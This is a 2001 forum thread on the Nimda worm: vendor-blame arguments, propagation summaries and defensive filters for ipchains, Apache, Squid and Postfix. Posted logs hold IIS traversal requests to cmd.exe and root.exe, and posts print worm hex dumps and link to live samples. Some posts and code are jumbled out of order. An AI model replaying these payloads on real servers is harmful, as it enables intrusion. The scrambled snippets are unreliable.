Hrmm.. i was rather disturbed today. I was looking around my linux box and found HUNDREDS of *.eml files. Now.. does anyone want to venture a guess as to how they got in there? Some of them I've seenbefore .. . (like the firs tpart of the file name).. others i haven't... my directory structure looks right... any idea how it got in?
~ Matt
site referrer remote_host starttime pagecount pages /scripts/root.exe?/c+dir?1000819109
www Direct 63.112.252.2 2001-09-18 09:18:29 1
Time is EDT
Hammer of Truth
In the case of IIS, Microsoft claimed that it was secure.
a tion/features/web.asp)
.GIF URL. When his system sees a "GET" on his web server for the .GIF, he knows that your e-mail address is valid, the IP address of your machine, and that he's got a live one. Welcome to more spam. And you cannot turn off HTML fetching from your e-mail or have it ask you first.
Show me a quote where Microsoft claims that their software is perfect. No software is perfectly secure
I did not say that they claimed it was "perfect". I only said that they claimed it was secure (see the URL http://www.microsoft.com/windows2000/server/evalu
I like being able to open a document that someone e-mails me without having to save it off somewhere.
Now combine that "feature" with Microsoft's default of hiding file extensions and someone e-mails resume.doc.exe, the recipient sees resume.doc, and he double clicks on it. Outlook then executes the application without so much as an "are you sure?" prompt.
But what I was referring to was execution of script languages (e.g. VBScript) within e-mails.
Are you aware that a spammer can send you HTML e-mail and know when it is displayed on your screen? All he does is include a unique 1x1
These are all examples of gross security flaws that Microsoft has created. Sorry, but that's negligence in its simplist form.
of our server in germany, 213.x ip ;)
statistikexactly. alot of the problem here is with the users. they got what they paid for. from my discussions with a friend who works on alot of ms boxes, it seems that iis can be as secure as apache as long as you know what you are doing. people who say "*nix" doesnt have the sort of problems are living on borrowed time.
alot of the boxen that are being infected are doing so because they are running default installs with no patches. if you told me you were running a default redhat install i would laugh my ass off.
my main problems with windows is the security paradigm they use, and how the market ease of use. because of this a normal user can execute programs that infect system files. sort of like browsing the web as root. by marketing their product as "point and click"ish they attract the lowest common denominator in users.
it basically comes down to being an informed user. by the time you get to admining a unix box you are normally already a bit more informed, and you probably arent making the decision because it's _easy_ to use.
-- john
Over 5,000 requests by the worm so far on this end.
This one should be a real bandwidth eater.
Do you like German cars?
If you want to make it apples and apples, I would not blame my bank, but instead the software company that created their operating system, or the person or group of people that wrote their CGI scripts. After all, the bank just maintains the PC's, they don't write the software themselves, correct?
Thank you. You just proved my point. You would blame the company that wrote the software, not the bank that "just maintains the PCs." Well, Microsoft wrote IIS and now you want to foist 100% of the blame on the user who 'just maintains the PC.'
Because the people that are the cause of this problem don't bother to register their software. How exactly could Microsoft reach these clueless morons?
Where do you get your information on what kinds of people do and do not register software? Would that fall under the category of "brown facts"?
Maybe the fact that Microsoft does not make a proactive effort to notify users, by mail -- including a patch disc, when there are problems explains why software registration is less than it could be.
I said Microsoft patched THE FLAW.
You can release a patch to correct a flaw or you can patch a program or system. You cannot patch a flaw. If I tell my client that I patched something, he assumes, correctly, that I installed a software change on one or more systems, not that I created the patch and left it for his staff to read about on the company web page. But, that's semantics and I seriously doubt that either of us will concede that point.
Does it have another check box that says "Always open attachments, especially those that could be a virus?" :)
Do you like German cars?
I did not say that they claimed it was "perfect" [...] see the URL http://www.microsoft.com/windows2000/server/evalua tion/features/web.asp
A claim of being "secure" implies a claim of "perfect security". I looked at the page, and I don't see the quote. They talk about "security features", but I don't see the claims you are talking about. Tell me the quote.
Now combine that "feature" with Microsoft's default of hiding file extensions and someone e-mails resume.doc.exe, the recipient sees resume.doc, and he double clicks on it.
Maybe that's not a feature for you, but it's certainly more user friendly to not see an extension. Does it create unintended consequences? Yes. But I don't this as a reasonable criticism, unless you also say all Macintosh names should have extensions as well.
Outlook then executes the application without so much as an "are you sure?" prompt.
Not true. Outlook gives you all sort of warning bells and whistles for a long time now.
All he does is include a unique 1x1 .GIF URL.
Again, an unintended consequence of HTML e-mail. But I think it's unreasonable to say words to the effect of "Microsoft should have known that people would be able to track me by supporting HTML e-mail". Microsoft wasn't even the first to support it ... they used RTF in the beginning, but everyone else used HTML (for obvious reasons, since it's a standard).
And you cannot turn off HTML fetching from your e-mail or have it ask you first.
Again, untrue. At least since Outlook 2000 (which I run), you can adjust security settings for HTML e-mail, or HTML anything else for that matter. It's actually very flexible.
These are all examples of gross security flaws that Microsoft has created.
I don't necessarily disagree that Microsoft could do more, but it's also unreasonable to imply that they've done nothing, or that we should go back to being green screen luddites. This is going to be a learning process like anything else.
Sometimes it's best to just let stupid people be stupid.
It's sitting at http://www.initialized.org/virus/readme.eml if anyone wants to take a peak at it...
*DO NOT OPEN IT IN INTERNET EXPLORER.*
Do you like German cars?
It's at http://www.initialized.org/virus/readme.exe .. Just remember not to run it on Windows. :)
Do you like German cars?
Can someone check if the client will follow redirects ? I yes, I suggest to make Redirect /scripts , /c/ and /d/
rules to http://www.microsoft.com for
In itself that should be a good punition.
Daniel
<VirtualHost 24.222.rest.ofyourip>
ServerName 24.222.rest.ofyour.ip
ErrorLog
CustomLog
</VirtualHost>
I like ice cream.
They talk about "security features", but I don't see the claims you are talking about. Tell me the quote.
There is not a single quote saying "this product is 100% secure." The clear and obvious purpose of the web page is to leave the user with the impression that the IIS product is secure.
At least since Outlook 2000 (which I run), you can adjust security settings for HTML e-mail, or HTML anything else for that matter. It's actually very flexible.
Then tell me how to prevent it from fetching items from the web -- i.e., no permission for Outlook to access data via HTTP. Then I might switch from Outlook Express 6 -- the most current version of Outlook Express and what I run.
Outlook gives you all sort of warning bells and whistles for a long time now.
You are correct that the newer versions do give warnings. I stand corrected.
The best site to track this incident IMO (incidents.org) now has a pretty good picture of what's going on from a technical perspective.
A short summary:
The Nimda worm is now known to propogate four ways:
(1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.
(2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.
(3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.
See: www.incidents.org/react/nimda.php for the full details.
- YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.
---------
There is no try at jedinite.com
Microsoft Software is more popular and so it gets hit more. If linux was just as popular you would see the same thing happen.
You wish. The MSFT-toadying media thought that x.c , a FreeBSD and Linux worm, was going to be the "Next Code Red". My machine got more hits from sadmind/IIS worm (Solaris) than x.c. C'mon, shill-boy, why aren't you toeing the Wagg-Ed line? The truth of the matter lies more in the fact that Windows is more-or-less a software and hardware monoculture. Any flaw in IIS affects *all* of the population. The Linux/Unix/BSD/Solaris population has much greater diversity: a flaw in the WN web server isn't going to affect sites using thttpd. Similarly, there are dozens of Linux email clients in use, from mailx to Pine to mh. I don't think there's a common scripting language amongst the diversity of Linux email clients, and I don't think *any* of them are dopey enough to execute "readme.eml" files.
People that dislike windows and love linux are the reason for this attack. Its these people that are writing the viruses and worms. You've got to be kidding, right? Have you got any evidence whatsoever to back that up?
No. Users were negligent in purchasing and deploying software that was already known ahead of time, to be defective.
Microsoft's reputation is well established. Ignorance is no excuse.
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
Do you really want to establish a precedence that sez all software developers are libel for the worms others create?
No. I want to establish a precedent that makes software publishers responsible for making their products work as described and proactively notifying users of patches necessitated for security reasons.
I'm guessing you don't write much code.
You guessed wrong. I've been a professional software developer since 1980 -- back when Microsoft's only products were languages like BASIC, Fortran, and Cobol for 8-bit CP/M systems. Now I develop embedded systems -- currently for satellites. If my code causes a mission failure, I expect to be unemployed. So I don't have a lot of sympathy for Microsoft when they pretend that it is impossible to write robust, secure software.
Two servers I take care of have had 3000 and 4000 hits, respectively, today -- and the one w/4000 is just a lil' 486 w/16mb of ram. Go selenium go!
Carousel is a lie!
ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too.
Why stop there? The end users are being hurt by the ISPs. The ISPs should be catching these exploits and shutting down traffic from those servers. And the end users' dogs are being hurt by the end users. When I spend more time on the internet, I have less time to feed my dog. Not to mention that when I don't feed my dog my dog sometimes goes out and bites my next door neighbor. And that in turn causes her to call 911. And when 911 is busy people die. Every one of those people should be suing Microsoft, damnit.
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Adding ipchains rules will cause your machine to ignore the packets, but they're still consuming time on your DSL/cable/whatever link.
It's still a small improvement for those of us with home webservers, which will now just get and drop a couple SYN packets, rather than playing along through a whole HTTP request.
My point exactly. Of course, total security is a fallacy, but using a system or a method that is demonstrably risky is plain dumb.
So yes, corporate IS departments keep installing Windows all over the place even in places where they could avoid it because "that's what the market is".
Imagine this discussion:
Of course, at the end the landlord shoots the architect, to the acclaim of the whole profession.
So why do we endure these IS "architects"?
--
Mad science! Robots! Underwear! Cute girls! Full comic online! http://www.girlgeniusonline.com/
A few small fixes, but mainly this puts everything on a second chain, so that only incoming HTTP requests will have to go through hundreds of ipchains rules.
/var/log/httpd/error_log* | awk '{print $8}' | sed -e 's/]//' | sort | uniq`; do
#!/bin/sh
if [ ! "`ipchains -n -L block80`" ]
then ipchains -N block80
fi
if [ ! "`ipchains -L input | grep block80`" ]
then ipchains -A input -p tcp --syn -d 0/0 80 -j block80
fi
for LUSER in `egrep "winnt|default\.ida"
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A block80 -s $LUSER -d 0/0 -j DENY
echo "Blocking $LUSER"
fi
done
I was digging thru my logs when I found this entry (note the date)...
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af. .%c0%af..%c0%af..%c0%af/winnt/system32/
207.##.###.# - - [02/Apr/2001:03:15:00 -0700] "GET
cmd.exe?/c%20dir HTTP/1.0" 404 329
So it looks like someone was giving this one a dry run several months ago...
Jay (=
acl umbricus_microsoftius url_regex \.eml$
http_access deny umbricus_microsoftius
Obviously it quite an easy filter to come up with, but I may as well post it for anyone that didn't think of it. Bit easier than reconfiguring 4 gazillion IE boxen and fielding all the calls about websites needing VBS/Javascript not working after you've fixed people's machines.
sorry for the last ugry post, bad manipulation.
/_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 249 major part of the mail can be found in the hex dump as :
.......| which corresponds to the mail :
I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.
after hexadecimal dump, i've noticed this string :
000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|
"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
in the code i can found :
00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|
_vti_bin and _mem_bin are part of my apache access logs :
213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET
000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail,
or :
00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID:
I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).
Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.
No, Thursday's out. How about never - is never good for you?
So who's gonna write a version of the CR/CR2 perl script that Kryptolus wrote? I would like to, but I'm not quite enough of a perl hacker to pull off something worth running on the logs that this worm is generating.
They arent as bad as they were this afternoon (theres at least one green time now), but check out the damage.
Internet Traffic Report
Nick Tonkin has already written an extension to Apache::CodeRed that notifies administrators of infected hosts of both the CodeRed and Nimda worms. The module requires Apache+mod_perl and is available from here.
Nick's announcement is here and important configuration instructions are here.
Thanks to Nick, Nathan, and all the mod_perl crew for their quick work.
These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails...
.eml or .exe files). Moreover, I'm fairly sure that MS has patches for these vulnerabilities in IE5.
.eml bug.
...The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file...
Nowhere on the link you provided does it specify which versions of IE are affected. Indeed, I'm fairly certain that IE6 is *not* affected (or at least requires the user to respond to a dialog box before it will run
On the other hand, I believe that IE4 *is* vulnerable to at least the
[F]or those of you using Apache, here's one way you can redirect these nimda probes just like you could the Code Red probes. All the requests vary, but they seem to include a call to one or more of the following somewhere in the string: cmd.exe, root.exe, or Admin.dll. You can't count on these appearing at the beginning or end of the string, so you have to match it anywhere within. I just took the simplest approach by matching either .exe or .dll.
So if you want to redirect such requests to Microsoft support, for example, you might use the following:
RedirectMatch ^.*\.(exe|dll).* http://support.microsoft.com
Since you're using Linux or some other Unix-like operating system (I presume), it's unlikely you need to serve up any pages that include the strings ".exe" or ".dll", so this shouldn't interfere with the normal operation of your site.
"with their freedom lost all virtue lose" - Milton
As in 'Admin' spelled backwards?
Check out:
http://bugs.apache.org/index.cgi/full/543.
One of the requests made by the worm is:
You will probably find that this is not in your logs and that a segfault appears in it's place.
We failed to find any workaround but the server load is so low that we dont deem it worth the hassle of upgrading to a newer apache.
This worm is spreading through email, even on systems that are 100% patched and running antivirus packages. The problem is the architecture of Outlook and Exchange. Microsoft has known about this for a long time, and has released nothing but quick fixes. I've testified as an expert witness in court cases before, and I would have no problem testifying as to Microsoft's negligence in the case of this particular virus, based on the evidence I have so far (although it's still early).
We were hit hard by this at my company today. Our IT department just didn't learn its lesson from Code Red, and allowed people to continue running IIS on their personal machines.
Wanna know how to get rid of it? People where I work have had success with the following:
Bill Gates and Steve Ballmer should be drawn and quartered for this one... How much have these vulnerabilities cost companies in the last two years? It's just too bad that product liability laws don't apply to Micro$oft.
"You done taken a wrong turn."
-Bill McKinney, in Deliverance
Man.. it's nasty too...
paulb
Paul Bettner
Game Developer et al
> Internet Worm clothing and other novelties.
How do you keep the worm in it?
It's got one sleeve and nothing else.
For safety use buttons, not a zipper.
Make sure you sell them by the gross, because when you have one worm you have many.
Make sure you label them as gross.
Offer a subscription service, the worm-clothing-of-the-month club, so they can keep next month's worm comfortable.
"Got Worms?"
"I'm with Worm ->"
"I'm with Worm ->
->
->
->"
"Did my worm poke you yet?"
"Thanks, Bill!"
"Don't Worm, Be Happy!"
"Worm!"
"With Worm Regards"
"Fly Northwest To Worm Climate"
"Microsoft: Bringing Worms to Minnesota Year-Round"
"My MS Computer Is a Dog, It Has Worms"
"Worms: Automatic Distributed Computing"
"Worms. Because 1GHz is a terrible thing to waste."
So what happened to "truth in advertising"?
Name something on that page that is not true.
So what you're saying is, the same person who finds an email client more convenient because it hides file extensions from him is going to go into the IE options and set up their own security zone? Suuuuure....
First of all, it's the mail options, not the IE options. Second of all, I know exactly how to do it, but I don't feel the need, and the vast majority of people don't need to, either.
Again, I'm not saying that the security in Outlook is perfect, but what I am saying is that arguing that mail clients should be intentionally brain damaged so that you can't open a document from a mail message is just stupid. I want more power, but implemented in a safe way. The Linux advocate's solution is to simply take away power ("Just use pine!").
Sometimes it's best to just let stupid people be stupid.
Just add the following to your httpd.conf:
/scripts/ http://www.microsoft.com/
/vti_bin/ http://www.microsoft.com/
/_mem_bin/ http://www.microsoft.com/
/c/winnt/ http://www.microsoft.com/
/d/winnt/ http://www.microsoft.com/
/msadc/ http://www.microsoft.com/
/MSADC/ http://www.microsoft.com/
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
Redirect permanent
This way, any time the worm hits you it'll go to the Borg instead...
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
They are also not bound by the "you can't sue us" clause either...
'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
Except it probably needs to be an ISP who does NOT use Microsoft software...
Late followup, but it sounds like this won't be sufficent to clean the system. Bits from NTBugTraq:
.exe (note the
... looks nasty enough to warrent a reinstall.
Virus sets IE5 to IE4 compatibility mode (apparently to circumvent
security) and crashes Explorer.exe when IE is launched. IExplore.exe
appears to be hacked, and there is now a hidden IExplore
space before the extension) in same directory.
IIS console hacked: New MMC.EXE placed in \WINNT directory, which may
override original version in \WINNT\System32.
EXE files placed into TEMP directory. Note that most/all hacked EXE
files are flagged Hidden.
NT Account "Guest" was made a member of the NT "Administrators" group!
And maybe more
Whenever I hear the word 'Innovation', I reach for my pistol.
There are many flaws in their "Knowledge Base" that have never been patched -- some of which are related to security.
There are also quite a few where you have to phone up and chase Microsoft to get a patch.
I'm not going to question that you got this from wget, but what I'm wondering is, how did you find all that out using wget? Perhaps I'm not as familiar with this utility as I should be?
Wietese Venema, the main developer of Postfix (you know, the wonderful
/etc/postfix/main.cf:
/etc/postfix/body_checks:
/^[SPACE TAB]*name=.*\.exe/ REJECT
sendmail replacement that Redhat is removing from Redhat 7.2) posted this
to the postfix list:
-----------
There's a new worm hammering networks via email, via open shares,
and via vulnerable web servers.
Propagation via email can be stopped with:
body_checks = regexp:/etc/postfix/body_checks
Inside the [] are one space and one tab.
This is also a reminder that Postfix needs decent MIME parsing
support so it can filter this sort of malware more effectively.
Wietse
The worm's MIME headers, with spaces inserted to avoid false alarms.
- - = = = = _ A B C 1 2 3 4 5 6 7 8 9 0 D E F _ = = = =
C o n t e n t - T y p e : m u l t i p a r t / a l t e r n a t i v e ;
b o u n d a r y = " = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = = "
- - = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = =
C o n t e n t - T y p e : t e x t / h t m l ;
c h a r s e t = " i s o - 8 8 5 9 - 1 "
C o n t e n t - T r a n s f e r - E n c o d i n g : q u o t e d - p r i n t a b l e
< H T M L > < H E A D > < / H E A D > < B O D Y b g C o l o r = 3 D # f f f f f f > < i f r a m e s r c = 3 D c i d : E A 4 D M G B P 9 p h e i g h t = 3 D 0 w i d t h = 3 D 0 > < / i f r a m e > < / B O D Y > < / H T M L > - - = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = = - -
- - = = = = _ A B C 1 2 3 4 5 6 7 8 9 0 D E F _ = = = =
C o n t e n t - T y p e : a u d i o / x - w a v ;
n a m e = " r e a d m e . e x e "
C o n t e n t - T r a n s f e r - E n c o d i n g : b a s e 6 4
C o n t e n t - I D : < E A 4 D M G B P 9 p >
RFC1925
The last time there was a widespread Unix worm was the days of the Morris worm. That was more than ten years ago - an eon in Internet time. Since then, the dangers of buffer overrun exploits have been well documented, and bugs of this sort have been fixed and are continually being fixed. MS is merely a johnny come lately to this game, and it looks like Johnny didn't bother to learn from those that came before him.
I do not think it is ethical that microsoft is allowed, as a corporation to release insecure software over and over. I mean, you'd think that once they figured out that it was insecure, they'd fix it next go-round, right? Yeah, well....
What i was trying to bring to people's minds for a second is that this might not be the fault of the programmers, but of the administration. For example: When's the next major dot release of the linux kernel comming out? No one knows for sure, cause technically no one's up against a deadline, as a generalized statement about open source. When no one is paying you to write code, you get it done when you get it done, and done right. When someone is paying your paycheck and matching your 401k, you get it done when they want it done, tested or not. I mean, it may have a hole, but you gotta feed your kids, right?
So what i just want people to be careful about is not to say that M$ programming sucks, or that they employ lazy programmers, or that they don't have any idea what they're doing. Their instructions are "get it done, and make it pretty, and get it done two days ago".
sig?
I know that
SP2 also protects against the server vulnerabilty, though it isn't spelled out where everyone is being directed by Microsoft or the AV/News Companies. So if you have uped to SP2, the IIS issue is not a problem
For this info, go to
Protect Your Computers From the Nimda Worm
at Microsoft's site
---"What did I say that sounded like 'Tell me about your day?'"---
this exploit really only hits Windows boxes running IIS that haven't been properly patched?
Hmm... sounds like an administrator error.
*SHRUG*
Codifex Maximus ~ In search of... a shorter sig.
gambit32@endgame:/trustno1/edrive/Program Files/Apache Group/Apache/logs$ grep "
:) )
24." * | grep -v default.ida | grep -v XXXXXXX | cut -d [ -f 3- | sort | uniq |
wc -l
1000
1000 hits here... (dont ask about my paths... i run apache on my windows machine, and port forward. its easier that way for me, regardless on how stupid it looks
I'm not that informed, but two simple Debian lines are not too much to ask of anyone. First, remove the little # marks from /etc/apt/sources.list, then :>
apt-get upgrade
apt-get update
Bango, you've got upgrades and "patches".
Red Hat has a more mousey web based upgrade system that will work on one machine without fee. Just go visit their web site and look for support. With a little effort, you can learn how to use RPM and gnoRPM (?). Try "info rpm" or "man rpm" at a bash prompt, that tv with a foot on it called gnome terminal.
There you go. That's nicer than being laughed at, isn't it?
Friends don't help friends install M$ junk.